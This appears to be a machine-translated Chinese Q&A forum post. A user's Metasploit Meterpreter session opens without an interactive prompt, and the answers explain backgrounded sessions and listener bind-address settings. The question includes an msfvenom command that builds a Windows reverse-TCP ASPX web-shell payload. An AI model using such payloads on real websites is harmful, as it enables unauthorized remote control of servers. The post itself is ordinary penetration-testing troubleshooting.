Metasploit 打开 Meterpreter 但没有提示请帮忙

信息安全 Web应用程序 元数据 计程器
2021-09-05 17:39:35

我已经使用 msfvenom 创建了一个网站的有效负载,并启动了exploit/multi/handlerexploit,然后它们相互连接并创建了一个meterpreter 会话,如下所示,但我没有得到我认为应该得到的meterpreter 提示输入任何命令只会让我回到 msf exploit(handler) 提示符。有没有人经历过这种情况。我的操作系统是鹦鹉,有效载荷是使用以下命令制作的:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx

在此处输入图像描述

任何帮助表示赞赏,我准备提供可能需要的任何其他信息。

2个回答

Meterpreter 会话已进入后台,这是 Metasploit 现在的默认行为。

查看后台会话:

sessions -l

与会话交互:

sessions -i <session id>

使用Ctrl + C然后session -i不会有帮助,因为连接已经断开并且执行meterpreter命令将返回未知。

只需设置ReverseListenerBindAddressLHOST这为我解决了这个问题。

PS:ReverseListenerBindAddress必须与 reverse_tcp 中的 LHOST 相同。

其它你可能感兴趣的问题
上一篇nmap 会追溯到你吗? 下一篇JSON劫持与JSONP注入不同吗?